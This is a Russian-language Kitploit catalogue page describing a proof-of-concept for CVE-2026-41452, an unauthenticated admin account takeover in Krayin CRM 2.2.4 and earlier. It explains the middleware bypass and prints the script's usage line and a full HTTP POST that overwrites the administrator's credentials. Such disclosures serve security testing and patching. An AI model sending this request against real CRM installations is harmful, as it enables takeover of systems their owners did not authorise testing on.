Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41452-poc — Эксплойт proof-of-concept для CVE-2026-41452 — критического обхода аутентификации в Krayin CRM <= 2.2.4, позволяющего неаутентифицированный захват учётной записи администратора через обход middleware. | Kitploit
Инструменты/GitHubGitHub/o-sec/cve-2026-41452-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеАутентификация
GitHubo-sec/cve-2026-41452-poc

CVE-2026-41452-poc

Эксплойт proof-of-concept для CVE-2026-41452 — критического обхода аутентификации в Krayin CRM <= 2.2.4, позволяющего неаутентифицированный захват учётной записи администратора через обход middleware.

Репозиторий
13 ч 59 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-41452: Захват учётной записи администратора Krayin CRM через обход middleware

CVSS v3.1: 9.8 Critical Target: Krayin CRM <= 2.2.4 License: MIT

Доказательство концепции (PoC), демонстрирующее критическую уязвимость отсутствия аутентификации (CVE-2026-41452), затрагивающую Krayin CRM версии 2.2.4 и более ранние.

Эта уязвимость позволяет неаутентифицированным удалённым злоумышленникам обойти логику middleware установки приложения (CanInstall) путём внедрения определённых HTTP-заголовков, что приводит к полной перезаписи конфигурации основной учётной записи администратора.

[!WARNING]
Отказ от ответственности: Этот репозиторий и содержащаяся в нём информация предоставлены строго в образовательных целях, для исследований в области безопасности и авторизованного защитного аудита. Неавторизованное тестирование или эксплуатация компьютерных систем строго незаконны. Автор не несёт ответственности за любое неправомерное использование данного материала.


Обзор уязвимости

  • CVE ID: CVE-2026-41452

  • Тип уязвимости: Отсутствие аутентификации / Обход middleware

  • Критичность: Критическая (CVSS 9.8)

  • Затронутое ПО: Krayin CRM <= 2.2.4

  • Исправленная версия: Krayin CRM >= 2.2.5

Техническое описание

Уязвимость находится в middleware настройки приложения. Неаутентифицированный злоумышленник может добавить заголовок X-Requested-With: XMLHttpRequest к специально сформированному запросу, нацеленному на эндпоинт /install/api/admin-config-setup. Это подавляет ожидаемую проверку перенаправления в middleware CanInstall, открывая неаутентифицированную операцию базы данных updateOrInsert, которая нацелена на жёстко заданный ID (1) основного системного администратора.


Доказательство концепции (PoC)

Использование

Запустите скрипт против целевого экземпляра, который вы уполномочены тестировать:

root@kitploit:~
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>

Пример HTTP-запроса

Под капотом обход срабатывает через следующую структуру HTTP-транзакции:

root@kitploit:~
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded

name=test1&[email protected]&password=Password123

Ссылки

  • nist cve-2026-41452 detail
Скачать инструмент